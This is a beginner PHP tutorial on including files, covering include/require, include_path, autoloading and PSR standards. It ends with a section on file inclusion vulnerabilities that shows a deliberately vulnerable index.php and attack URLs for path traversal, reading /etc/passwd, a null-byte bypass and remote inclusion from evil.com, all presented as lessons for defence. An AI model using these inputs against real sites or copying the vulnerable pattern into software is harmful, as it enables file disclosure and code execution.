PHP for beginners. Including files


Continuing the "PHP for beginners" series, today's article is devoted to how PHP finds and includes files.

What for and why


PHP is a scripting language originally created for quickly knocking together home pages (yes, it really did start out as Personal Home Page Tools). Later people began building shops, social networks and other makeshift projects with it, which goes far beyond what was originally intended. Why am I telling you this? Because the more functionality you code, the stronger the urge to structure it properly: get rid of duplicated code, split it into logical pieces and include them only when needed (the same feeling you get when reading a sentence that should have been split into several). For this purpose PHP has several functions whose general meaning comes down to including and interpreting the specified file. Let's look at an example of including files:

    // file variable.php
    $a = 0;

    // file increment.php
    $a++;

    // file index.php
    include('variable.php');
    include('increment.php');
    include('increment.php');
    echo $a;

If you run index.php, PHP will include and execute all of it in sequence:

    $a = 0;
    $a++;
    $a++;
    echo $a; // prints 2

When a file is included, its code ends up in the same scope as the line that included it, so all variables available on that line are also available in the included file. Classes and functions declared in the included file go into the global scope (unless, of course, a namespace was specified for them).

If you include a file inside a function, the included file gets access to the function's scope, so the following code also works:

    function a() {
        $a = 0;
        include('increment.php');
        include('increment.php');
        echo $a;
    }

    a(); // prints 2
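If you want to try this without creating files by hand, here is a minimal sketch. It assumes a throwaway increment file created in the temporary directory; the function name countInsideFunction is made up for the illustration. It also shows that a global variable with the same name stays untouched.

```php
<?php
// Hypothetical helper file, created on the fly so the example is self-contained.
$incrementFile = tempnam(sys_get_temp_dir(), 'inc');
file_put_contents($incrementFile, '<?php $a++;');

$a = 10; // a global variable with the same name

function countInsideFunction(string $file): int
{
    $a = 0;        // local variable of the function
    include $file; // runs "$a++" in the function scope
    include $file;
    return $a;
}

$local = countInsideFunction($incrementFile);
echo $local, ' ', $a, PHP_EOL; // local counter, then the untouched global

unlink($incrementFile);
```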

A separate note on the magic constants __DIR__, __FILE__, __LINE__ and others: they are bound to the file in which they are written, and their values are resolved before the inclusion takes place.
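A small sketch of what that means in practice, assuming a temporary file that simply returns its own __FILE__ and __LINE__: the values describe the included file, not the script that includes it.

```php
<?php
// Hypothetical included file that reports its own location.
$included = tempnam(sys_get_temp_dir(), 'magic');
file_put_contents($included, '<?php return [__FILE__, __LINE__];');

[$file, $line] = include $included;

// $file is the path of the included file, not of this script.
var_dump($file !== __FILE__);
// $line is counted inside the included file.
var_dump($line);

unlink($included);
```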
A peculiarity of including files is that the parser switches to HTML mode at the start of the included file, so any code inside it must be enclosed in PHP tags:

    <?php
    // included code
    // ...
    //
    ?>

If the file contains only PHP code, the closing tag is usually omitted so that no stray characters accidentally end up after it, which can cause problems (I will say more about this in the next article).
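To make the problem visible, here is a hedged sketch with two temporary files: one ends with a closing tag followed by two stray spaces, the other has no closing tag. The helper captureOutput is an invented name; it only collects whatever the included file prints.

```php
<?php
$dir = sys_get_temp_dir();
$withTag = tempnam($dir, 'tag');
$withoutTag = tempnam($dir, 'tag');

file_put_contents($withTag, "<?php \$x = 1; ?>  "); // two stray spaces after the tag
file_put_contents($withoutTag, "<?php \$x = 1;\n");  // no closing tag at all

// Include a file and return everything it sent to the output.
function captureOutput(string $file): string
{
    ob_start();
    include $file;
    return ob_get_clean();
}

$leaked = captureOutput($withTag);
$clean = captureOutput($withoutTag);

var_dump(strlen($leaked)); // the stray spaces went to the output
var_dump(strlen($clean));  // nothing was printed

unlink($withTag);
unlink($withoutTag);
```

Output like this is harmless on the command line, but on a web page it is sent to the browser before your own code gets a chance to send headers.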
Have you ever seen a site contained in a single file of 10,000 lines? It brings tears to your eyes (╥_╥) ...

File connection functions


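As mentioned above, PHP has several functions for including files:

  • include : includes and executes the specified file; if the file is not found, a warning is raised
  • include_once : same as above, but the file is included only once
  • require : includes and executes the specified file; if the file is not found, a fatal error is raised
  • require_once : same as above, but the file is included only once
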
Strictly speaking, these are not functions but special language constructs, so the parentheses can be omitted. There are also other ways to include and execute files, but that is digging deeper; consider it an extra-credit task for you ;)
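One practical difference between include and require is how they react to a missing file. The sketch below assumes a path that does not exist (the file name is invented) and only demonstrates include, because a failed require would stop the script.

```php
<?php
// A path that is assumed not to exist.
$missing = sys_get_temp_dir() . '/no-such-file-' . uniqid() . '.php';

// include: a warning is raised (suppressed here with @) and the script goes on.
$result = @include $missing;
var_dump($result);

// require would stop the script with a fatal error at this point:
// require $missing;

echo 'still running', PHP_EOL;
```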
Let's look at the difference between require and require_once with an example. Take a single file, echo.php:

 <p>text of file echo.php</p> 

And include it several times:

    <?php
    // includes and executes the file
    // returns 1
    require_once 'echo.php';

    // the file is not included again, because it was already included
    // returns true
    require_once 'echo.php';

    // includes and executes the file
    // returns 1
    require 'echo.php';

As a result, the echo.php file is included twice:

 <p>text of file echo.php</p> <p>text of file echo.php</p> 
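The return values mentioned in the comments can be checked with a short sketch. It assumes a temporary file standing in for echo.php and captures the output so that the number of inclusions can be counted.

```php
<?php
// Temporary stand-in for echo.php.
$file = tempnam(sys_get_temp_dir(), 'echo');
file_put_contents($file, "<p>text of file echo.php</p>\n");

ob_start();
$first  = require_once $file; // included and executed
$second = require_once $file; // skipped: the file was already included
$third  = require $file;      // included and executed again
$html = ob_get_clean();

var_dump($first, $second, $third);
echo substr_count($html, '<p>'), PHP_EOL; // how many times the file was printed

unlink($file);
```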

There are a couple of directives that affect inclusion, although you are unlikely to need them: auto_prepend_file and auto_append_file. They let you specify files that are included before the main script runs and after it finishes, respectively. I can't even think of a real-life scenario where this might be required.

The task
Come up with and implement a scenario that uses the auto_prepend_file and auto_append_file directives. They can only be changed in php.ini, .htaccess or httpd.conf (see PHP_INI_PERDIR) :)

Where does PHP look?


PHP looks for included files in the directories listed in the include_path directive. This directive also affects the fopen(), file(), readfile() and file_get_contents() functions when they are asked to use the include path. The algorithm is quite simple: PHP checks each directory from include_path in turn until it finds the file; if it does not find it, it reports an error. To change include_path from a script, use the set_include_path() function.
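A minimal sketch of this lookup, assuming a temporary library folder and an invented file name demo_helper.php. The stream_resolve_include_path() function shows which file PHP would pick for a given name.

```php
<?php
// Hypothetical library folder with a single file in it.
$libDir = sys_get_temp_dir() . '/demo-lib-' . uniqid();
mkdir($libDir);
file_put_contents($libDir . '/demo_helper.php', '<?php return "found";');

// Append the folder to include_path, remembering the old value.
$oldPath = get_include_path();
set_include_path($oldPath . PATH_SEPARATOR . $libDir);

// Ask PHP where it would find the file, then include it by its bare name.
$resolved = stream_resolve_include_path('demo_helper.php');
$value = include 'demo_helper.php';

var_dump($resolved !== false, $value);

// Clean up and restore the previous include_path.
set_include_path($oldPath);
unlink($libDir . '/demo_helper.php');
rmdir($libDir);
```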

One important point when setting include_path is that Windows and Linux use different path separators, ";" and ":" respectively, so when adding your directory use the PATH_SEPARATOR constant, for example:

    // example path on Linux
    $path = '/home/dev/library';

    // example path on Windows
    $path = 'c:\Users\Dev\Library';

    // the code that changes include_path is identical on Linux and Windows
    set_include_path(get_include_path() . PATH_SEPARATOR . $path);

When you set include_path in the ini file, you can use environment variables such as ${USER}:

include_path = ".:${USER}/my-php-library"


If you specify an absolute path (starting with "/") or a relative one (starting with "." or "..") when including a file, the include_path directive is ignored and the file is looked up only at the specified path.
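Here is a hedged sketch of that rule. It assumes two temporary folders: one is put on include_path and contains the file, the other is empty and becomes the current directory. All names are made up for the illustration.

```php
<?php
$libDir = sys_get_temp_dir() . '/demo-lib-' . uniqid();
$workDir = sys_get_temp_dir() . '/demo-cwd-' . uniqid();
mkdir($libDir);
mkdir($workDir);
file_put_contents($libDir . '/only_in_lib.php', '<?php return "from include_path";');

$oldPath = get_include_path();
$oldCwd = getcwd();
set_include_path($libDir);
chdir($workDir);

$byName = include 'only_in_lib.php';       // searched for in include_path
$byDotPath = @include './only_in_lib.php'; // looked up in the current directory only

var_dump($byName, $byDotPath);

// Restore the environment and clean up.
if ($oldCwd !== false) {
    chdir($oldCwd);
}
set_include_path($oldPath);
unlink($libDir . '/only_in_lib.php');
rmdir($libDir);
rmdir($workDir);
```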
Perhaps safe_mode deserves a mention too, but it is ancient history (it was removed in PHP 5.4), and I hope you never run into it. If you do, at least you will know that it once existed.

Using return


Here is a small life hack: if an included file returns something with the return construct, that data can be received and used by the including script. This makes it easy to organize configuration files. An example for clarity:

    <?php
    // file config/db.php
    return [
        'host' => 'localhost',
        'user' => 'root',
        'pass' => ''
    ];

    $dbConfig = require 'config/db.php';
    var_dump($dbConfig);
    /*
    array(
        'host' => 'localhost',
        'user' => 'root',
        'pass' => ''
    )
    */

An interesting fact that life was just fine without: if functions are defined in the included file, they can be used in the main file regardless of whether they were declared before or after the return.
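A quick way to check this, assuming a temporary file that returns a value and then declares a function. The name demoDeclaredAfterReturn is invented for the sketch.

```php
<?php
// Hypothetical included file: the function is declared after the return.
$file = tempnam(sys_get_temp_dir(), 'ret');
file_put_contents($file, <<<'CODE'
<?php
return ['debug' => true];

function demoDeclaredAfterReturn(): string
{
    return 'still available';
}
CODE);

$config = include $file;

var_dump($config['debug']);
echo demoDeclaredAfterReturn(), PHP_EOL; // callable although it follows the return

unlink($file);
```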
The task
Write code that collects configuration from several folders and files. The file structure is as follows:

    config
    |-- default
    |   |-- db.php
    |   |-- debug.php
    |   |-- language.php
    |   `-- template.php
    |-- development
    |   `-- db.php
    `-- production
        |-- db.php
        `-- language.php

The code should work as follows:

  • if the system environment contains a PROJECT_PHP_SERVER variable equal to development, all files from the default folder must be included and their data stored in the $config variable; then the files from the development folder are included, and the data they return must overwrite the corresponding items stored in $config
  • the behavior is the same if PROJECT_PHP_SERVER is equal to production (naturally, using the production folder)
  • if the variable is missing or set incorrectly, only the files from the default folder are included.


Automatic inclusion


Constructs for including files look very bulky, and keeping them up to date is a chore in itself. Take a look at this piece of code from the example in the article about exceptions:

    // load all files w/out autoloader
    require_once 'Education/Command/AbstractCommand.php';
    require_once 'Education/CommandManager.php';
    require_once 'Education/Exception/EducationException.php';
    require_once 'Education/Exception/CommandManagerException.php';
    require_once 'Education/Exception/IllegalCommandException.php';
    require_once 'Education/RequestHelper.php';
    require_once 'Education/Front.php';

The first attempt to escape this kind of “happiness” was the __autoload function. More precisely, it was not even a built-in function: you had to define it yourself and use it to include the files you need based on the class name. The only rule was that each class had to live in a separate file named after the class (that is, myClass must be inside the file myClass.php). Here is an example implementation of such an __autoload() function (taken from the comments in the official manual):

The class that we will load:

    // class myClass in a separate file, myClass.php
    class myClass {
        public function __construct() {
            echo "myClass init'ed successfully!!!";
        }
    }

The file that loads this class:

    // example implementation
    // files are looked up according to the include_path directive
    function __autoload($classname) {
        $filename = $classname . ".php";
        include_once $filename;
    }

    // create the object
    $obj = new myClass();

Now for the problems with this function. Imagine that you include some third-party code, and someone there has already declared an __autoload() function for their own code. And voila:

 Fatal error: Cannot redeclare __autoload() 

To avoid this, a function was created that lets you register an arbitrary function or method as a class loader: spl_autoload_register. That is, we can create several class-loading functions with arbitrary names and register them with spl_autoload_register. Now index.php will look like this:

    // example implementation
    // files are looked up according to the include_path directive
    function myAutoload($classname) {
        $filename = $classname . ".php";
        include_once($filename);
    }

    // register the loader
    spl_autoload_register('myAutoload');

    // create the object
    $obj = new myClass();

“Did you know?” corner: the first parameter of spl_autoload_register() is optional. If the function is called without it, spl_autoload is used as the loader: it searches the folders from include_path for files with the .inc and .php extensions, and this list can be extended with the spl_autoload_extensions function.
Now every developer can register their own loader. The main thing is that class names do not clash, but that should not be a problem if you use namespaces.
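Several loaders can coexist because PHP calls them one after another, in the order they were registered, and stops as soon as the class becomes available. A minimal sketch of that behavior, assuming an invented class DemoLoadedClass stored in a temporary file:

```php
<?php
// Hypothetical class file that only the second loader knows about.
$classFile = tempnam(sys_get_temp_dir(), 'cls');
file_put_contents($classFile, '<?php class DemoLoadedClass {}');

$calls = [];

spl_autoload_register(function (string $class) use (&$calls): void {
    $calls[] = 'first'; // this loader does not know the class
});

spl_autoload_register(function (string $class) use (&$calls, $classFile): void {
    $calls[] = 'second';
    if ($class === 'DemoLoadedClass') {
        require $classFile;
    }
});

spl_autoload_register(function (string $class) use (&$calls): void {
    $calls[] = 'third'; // not reached once the class has been loaded
});

$object = new DemoLoadedClass();
print_r($calls);

unlink($classFile);
```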
Since functionality as advanced as spl_autoload_register() has existed for a long time, the __autoload() function was declared deprecated in PHP 7.2 and then removed completely in PHP 8.0 (X_x)
Well, the picture has more or less cleared up. Although, wait a minute: all registered loaders are queued in the order they were registered, so if someone has botched their loader, you can get a very unpleasant bug instead of the expected result. To prevent this, grown-up smart people described a standard that lets you plug in third-party libraries without problems, as long as their classes are organized according to PSR-0 (about 10 years old already) or PSR-4. Here is the essence of the requirements described in these standards:

  1. Each library must live in its own namespace (the so-called vendor namespace)
  2. A separate folder must be created for each namespace.
  3. A namespace can contain sub-namespaces, each also in a separate folder
  4. One class - one file
  5. The file name with the extension .php must exactly match the class name

Example from the manual:

Full class name              | Namespace       | Base directory         | Full path
\Acme\Log\Writer\File_Writer | Acme\Log\Writer | ./acme-log-writer/lib/ | ./acme-log-writer/lib/File_Writer.php
\Aura\Web\Response\Status    | Aura\Web        | /path/to/aura-web/src/ | /path/to/aura-web/src/Response/Status.php
\Symfony\Core\Request        | Symfony\Core    | ./vendor/Symfony/Core/ | ./vendor/Symfony/Core/Request.php
\Zend\Acl                    | Zend            | /usr/includes/Zend/    | /usr/includes/Zend/Acl.php


The only difference between these two standards is that PSR-0 supports legacy code without namespaces (that is, code written before PHP 5.3.0), while PSR-4 is free of this anachronism and also lets you avoid unnecessary folder nesting.
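To give a feel for how a namespace prefix is mapped to a base directory, here is a rough sketch of a loader in the spirit of PSR-4. It is not the reference implementation: the DemoVendor\App prefix, the temporary base directory and the Status class are all assumptions made for the example.

```php
<?php
// Assumed layout: classes of the hypothetical "DemoVendor\App" namespace live under $baseDir.
$baseDir = sys_get_temp_dir() . '/demo-psr4-' . uniqid() . '/';
mkdir($baseDir . 'Http', 0777, true);
file_put_contents(
    $baseDir . 'Http/Status.php',
    '<?php namespace DemoVendor\App\Http; class Status { public $code = 200; }'
);

spl_autoload_register(function (string $class) use ($baseDir): void {
    $prefix = 'DemoVendor\\App\\';
    if (strncmp($class, $prefix, strlen($prefix)) !== 0) {
        return; // not our namespace, let other loaders try
    }
    // Turn the rest of the class name into a path below the base directory.
    $relative = substr($class, strlen($prefix));
    $file = $baseDir . str_replace('\\', '/', $relative) . '.php';
    if (is_file($file)) {
        require $file;
    }
});

$status = new \DemoVendor\App\Http\Status();
echo $status->code, PHP_EOL;

unlink($baseDir . 'Http/Status.php');
rmdir($baseDir . 'Http');
rmdir($baseDir);
```

In a real project you would normally not write this by hand, since Composer generates such a loader for you.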

These standards made possible the appearance of a tool like Composer, the universal package manager for PHP. If you missed it, there is a good talk by pronskiy about this tool.


PHP injection


I also wanted to talk about the first mistake made by everyone who builds a single entry point for a site in one index.php and calls it an MVC framework:

    <?php
    $page = $_GET['page'] ?? die('Wrong filename');

    if (!is_file($page)) {
        die('Wrong filename');
    }

    include $page;

You look at this code and immediately want to pass it something malicious:

    // get unexpected behavior from the system
    http://domain.com/index.php?page=../index.php

    // read files in the server directory
    http://domain.com/index.php?page=config.ini

    // read system files
    http://domain.com/index.php?page=/etc/passwd

    // run files that were uploaded to the server beforehand
    http://domain.com/index.php?page=user/backdoor.php

The first thing that comes to mind is to forcibly append the .php extension, but in some cases this could be bypassed “thanks” to the null byte vulnerability (do read about it; it was fixed long ago, but you might run into an interpreter older than PHP 5.3, and it is worth knowing for general education anyway):

    // read system files
    http://domain.com/index.php?page=/etc/passwd%00

In modern PHP versions a null byte in the path of the included file immediately causes an inclusion error, even if the specified file exists and could be included. This is checked as follows: strlen(Z_STRVAL_P(inc_filename)) != Z_STRLEN_P(inc_filename) (this comes from the internals of PHP itself).
The second “worthwhile” idea is to check that the file is located in the current directory:

    <?php
    $page = $_GET['page'] ?? die('Wrong filename');

    if (strpos(realpath($page), __DIR__) !== 0) {
        die('Wrong path to file');
    }

    include $page . '.php';

The third, but not the last, variation of the check is the open_basedir directive, which lets you specify the directory where PHP is allowed to look for files to include:

    <?php
    $page = $_GET['page'] ?? die('Wrong filename');

    ini_set('open_basedir', __DIR__);

    include $page . '.php';

Be careful: this directive affects not only file inclusion but all work with the file system. When you enable this restriction you must be sure that you have not left anything outside the specified directory, neither cached data nor user files (although is_uploaded_file() and move_uploaded_file() will continue to work with the temporary folder for uploaded files).
What other checks are possible? Lots of options, it all depends on the architecture of your application.
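One such option, shown here only as a sketch, is not to build a path from user input at all but to look the page name up in a fixed allow-list. The function resolvePage and the page map below are invented for the illustration, and the paths are placeholders.

```php
<?php
/**
 * Map a user-supplied page name to a file from a fixed allow-list.
 * Returns null for anything that is not explicitly listed.
 */
function resolvePage(string $page, array $allowedPages): ?string
{
    return $allowedPages[$page] ?? null;
}

// Hypothetical page map; the paths are placeholders.
$allowedPages = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

var_dump(resolvePage('about', $allowedPages) !== null); // a known page is resolved
var_dump(resolvePage('../index.php', $allowedPages));   // unknown names give null
var_dump(resolvePage('/etc/passwd', $allowedPages));
```

With this approach the value from $_GET is never used as a path, only as a key, so tricks with ".." or absolute paths have nothing to act on.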

I also wanted to remind you of the “wonderful” allow_url_include directive (it depends on allow_url_fopen). It allows you to include and execute remote PHP files, which is far more dangerous for your server:

    // include a remote PHP script
    http://domain.com/index.php?page=http://evil.com/index.php

Now you have seen it and will remember it; never use it. Fortunately, it is off by default. You will need this feature slightly less often than never; in all other cases, design a proper application architecture in which the different parts communicate through an API.

The task
Write a script that includes PHP scripts from the current folder by name, keeping possible vulnerabilities in mind and avoiding slip-ups.

In conclusion


This article covers the basic foundations of PHP, so study it carefully, do the tasks and don't slack off; nobody will learn it for you.

PS


This is a repost from the PHP For Beginners series:


If you have comments on the content of the article, or perhaps on its form, describe them in the comments, and we will make this material even better.

Source: https://habr.com/ru/post/439618/